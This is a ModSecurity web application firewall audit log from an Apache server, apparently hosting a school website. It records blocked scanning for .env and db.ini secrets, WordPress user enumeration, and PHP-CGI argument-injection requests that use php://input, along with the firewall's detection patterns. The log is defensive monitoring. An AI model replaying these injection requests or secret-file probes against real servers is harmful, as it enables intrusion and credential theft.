Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--d3772b7b-C--
T examplecom
--d3772b7b-F--
HTTP/1.1 404 Not Found
Content-Length: 196
Connection: close
Content-Type: text/html; charset=iso-8859-1
--d3772b7b-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397198121279 3087 (- - -)
Stopwatch2: 1745397198121279 3087; combined=1972, p1=418, p2=1486, p3=20, p4=23, p5=24, sr=64, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--d3772b7b-Z--
--0a8dad21-A--
[23/Apr/2025:15:33:18 +0700] aAilzjI97BrbgvDq16T96gAAANM 103.236.140.4 54444 103.236.140.4 8181
--0a8dad21-B--
POST / HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--0a8dad21-C--
Š> examplecom
--0a8dad21-F--
HTTP/1.1 200 OK
Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT
ETag: "13cd-6034254946480"
Accept-Ranges: bytes
Content-Length: 5069
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
--0a8dad21-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397198415207 2616 (- - -)
Stopwatch2: 1745397198415207 2616; combined=1685, p1=385, p2=1232, p3=25, p4=19, p5=24, sr=57, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--0a8dad21-Z--
--7ae94753-A--
[23/Apr/2025:15:33:19 +0700] aAilzzI97BrbgvDq16T97QAAAMI 103.236.140.4 54450 103.236.140.4 8181
--7ae94753-B--
POST / HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 47.91.125.252
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 47.91.125.252
X-Forwarded-Proto: https
Connection: close
Content-Length: 29
User-Agent: Go-http-client/1.1
Content-Type: application/dns-message
--7ae94753-C--
ÿu examplecom
--7ae94753-F--
HTTP/1.1 200 OK
Last-Modified: Sat, 19 Aug 2023 08:21:22 GMT
ETag: "13cd-6034254946480"
Accept-Ranges: bytes
Content-Length: 5069
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
--7ae94753-H--
Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||103.236.140.4|F|2"] [data "TX:0=application/dns-message"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Stopwatch: 1745397199097477 3393 (- - -)
Stopwatch2: 1745397199097477 3393; combined=2052, p1=476, p2=1490, p3=26, p4=23, p5=37, sr=119, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--7ae94753-Z--
--8744203e-A--
[23/Apr/2025:15:45:26 +0700] aAioptIw_rqnm4P5_adlKAAAAEc 103.236.140.4 57448 103.236.140.4 8181
--8744203e-B--
GET /wp-json/wp/v2/users HTTP/1.0
Referer: https://smkn22-jkt.sch.id
Host: smkn22-jkt.sch.id
X-Real-IP: 154.86.114.147
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 154.86.114.147
X-Forwarded-Proto: https
Connection: close
Origin: https://smkn22-jkt.sch.id
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
--8744203e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8744203e-H--
Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745397926300602 3091 (- - -)
Stopwatch2: 1745397926300602 3091; combined=1302, p1=436, p2=836, p3=0, p4=0, p5=30, sr=74, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8744203e-Z--
--a66bdd4f-A--
[23/Apr/2025:18:09:15 +0700] aAjKWz1ahuoJLEjKiAXeBgAAAJg 103.236.140.4 38062 103.236.140.4 8181
--a66bdd4f-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.87.86
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.87.86
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3879.0 Safari/537.36 Edg/78.0.249.1
Accept-Charset: utf-8
--a66bdd4f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--a66bdd4f-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745406555347838 849 (- - -)
Stopwatch2: 1745406555347838 849; combined=391, p1=350, p2=0, p3=0, p4=0, p5=41, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a66bdd4f-Z--
--b8ccf265-A--
[23/Apr/2025:19:23:05 +0700] aAjbqRuwXEWV6ydgl51A-AAAAAQ 103.236.140.4 52536 103.236.140.4 8181
--b8ccf265-B--
POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 36.137.113.226
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 36.137.113.226
X-Forwarded-Proto: https
Connection: close
Content-Length: 221
Accept: */*
Upgrade-Insecure-Requests: 1
User-Agent: Custom-AsyncHttpClient
Content-Type: application/x-www-form-urlencoded
--b8ccf265-C--
--b8ccf265-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--b8ccf265-E--
--b8ccf265-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745410985782112 4577 (- - -)
Stopwatch2: 1745410985782112 4577; combined=3161, p1=478, p2=2645, p3=0, p4=0, p5=38, sr=77, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--b8ccf265-Z--
--bb623109-A--
[23/Apr/2025:19:29:45 +0700] aAjdORuwXEWV6ydgl51HwAAAAA4 103.236.140.4 49500 103.236.140.4 8181
--bb623109-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--bb623109-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--bb623109-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411385449652 1175 (- - -)
Stopwatch2: 1745411385449652 1175; combined=696, p1=334, p2=0, p3=0, p4=0, p5=362, sr=79, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--bb623109-Z--
--210b875b-A--
[23/Apr/2025:19:29:45 +0700] aAjdOT1ahuoJLEjKiAXzWwAAAJY 103.236.140.4 49510 103.236.140.4 8181
--210b875b-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--210b875b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--210b875b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411385619885 841 (- - -)
Stopwatch2: 1745411385619885 841; combined=348, p1=292, p2=0, p3=0, p4=0, p5=55, sr=77, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--210b875b-Z--
--881c734a-A--
[23/Apr/2025:19:29:45 +0700] aAjdOT1ahuoJLEjKiAXzXgAAAIU 103.236.140.4 49524 103.236.140.4 8181
--881c734a-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--881c734a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--881c734a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411385821086 854 (- - -)
Stopwatch2: 1745411385821086 854; combined=397, p1=358, p2=0, p3=0, p4=0, p5=39, sr=139, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--881c734a-Z--
--cde7061b-A--
[23/Apr/2025:19:29:45 +0700] aAjdORuwXEWV6ydgl51HwQAAABA 103.236.140.4 49538 103.236.140.4 8181
--cde7061b-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--cde7061b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--cde7061b-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411385990611 947 (- - -)
Stopwatch2: 1745411385990611 947; combined=446, p1=346, p2=0, p3=0, p4=0, p5=100, sr=78, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--cde7061b-Z--
--3be9b765-A--
[23/Apr/2025:19:29:46 +0700] aAjdOtIw_rqnm4P5_aeEYAAAAEQ 103.236.140.4 49560 103.236.140.4 8181
--3be9b765-B--
GET /settings/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--3be9b765-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3be9b765-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411386203893 747 (- - -)
Stopwatch2: 1745411386203893 747; combined=319, p1=283, p2=0, p3=0, p4=0, p5=36, sr=105, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3be9b765-Z--
--3240d63e-A--
[23/Apr/2025:19:29:47 +0700] aAjdO9Iw_rqnm4P5_aeEawAAAEI 103.236.140.4 49700 103.236.140.4 8181
--3240d63e-B--
GET /db.ini HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--3240d63e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3240d63e-H--
Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||103.236.140.4|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745411387902059 2284 (- - -)
Stopwatch2: 1745411387902059 2284; combined=787, p1=388, p2=370, p3=0, p4=0, p5=29, sr=71, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3240d63e-Z--
--45331b61-A--
[23/Apr/2025:19:29:50 +0700] aAjdPhuwXEWV6ydgl51H2QAAAAE 103.236.140.4 49884 103.236.140.4 8181
--45331b61-B--
GET /docker/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.108
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.108
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--45331b61-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--45331b61-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411390156247 631 (- - -)
Stopwatch2: 1745411390156247 631; combined=248, p1=214, p2=0, p3=0, p4=0, p5=34, sr=59, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--45331b61-Z--
--00c01a0a-A--
[23/Apr/2025:19:39:07 +0700] aAjfaz1ahuoJLEjKiAX6UwAAAI4 103.236.140.4 55582 103.236.140.4 8181
--00c01a0a-B--
GET /.env HTTP/1.0
Host: smkn22-jkt.sch.id
X-Real-IP: 45.148.10.172
X-Forwarded-Host: smkn22-jkt.sch.id
X-Forwarded-Server: smkn22-jkt.sch.id
X-Forwarded-For: 45.148.10.172
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
Accept-Charset: utf-8
--00c01a0a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--00c01a0a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745411947452103 1902 (- - -)
Stopwatch2: 1745411947452103 1902; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=107, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--00c01a0a-Z--
--5dbcf92c-A--
[23/Apr/2025:20:58:57 +0700] aAjyIRuwXEWV6ydgl512OQAAABI 103.236.140.4 51976 103.236.140.4 8181
--5dbcf92c-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 165.227.231.159
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 165.227.231.159
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);
Accept: */*
--5dbcf92c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--5dbcf92c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745416737451701 873 (- - -)
Stopwatch2: 1745416737451701 873; combined=386, p1=339, p2=0, p3=0, p4=0, p5=47, sr=77, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--5dbcf92c-Z--
--f96b637a-A--
[23/Apr/2025:21:00:07 +0700] aAjyZxuwXEWV6ydgl512mAAAABc 103.236.140.4 53032 103.236.140.4 8181
--f96b637a-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 196.251.71.106
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 196.251.71.106
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:47.0) Gecko/20100101 Firefox/47.0
Accept-Charset: utf-8
--f96b637a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f96b637a-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745416807132250 756 (- - -)
Stopwatch2: 1745416807132250 756; combined=315, p1=277, p2=0, p3=0, p4=0, p5=38, sr=84, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--f96b637a-Z--
--4eb2012e-A--
[23/Apr/2025:21:08:02 +0700] aAj0QjI97BrbgvDq16RPdAAAAMU 103.236.140.4 33352 103.236.140.4 8181
--4eb2012e-B--
POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 176.65.138.171
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 176.65.138.171
X-Forwarded-Proto: https
Connection: close
Content-Length: 110
User-Agent: python-requests/2.32.3
Accept: */*
Content-Type: application/x-www-form-urlencoded
--4eb2012e-C--
--4eb2012e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--4eb2012e-E--
--4eb2012e-H--
Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745417282777179 5288 (- - -)
Stopwatch2: 1745417282777179 5288; combined=3706, p1=501, p2=3172, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--4eb2012e-Z--
--af182907-A--
[23/Apr/2025:21:16:14 +0700] aAj2Lj1ahuoJLEjKiAUbwwAAAI0 103.236.140.4 40058 103.236.140.4 8181
--af182907-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--af182907-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--af182907-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745417774327819 726 (- - -)
Stopwatch2: 1745417774327819 726; combined=257, p1=220, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--af182907-Z--
--e0dc292b-A--
[23/Apr/2025:21:16:15 +0700] aAj2LzI97BrbgvDq16RQuwAAAMw 103.236.140.4 40068 103.236.140.4 8181
--e0dc292b-B--
GET /portal/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.107
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.107
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--e0dc292b-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
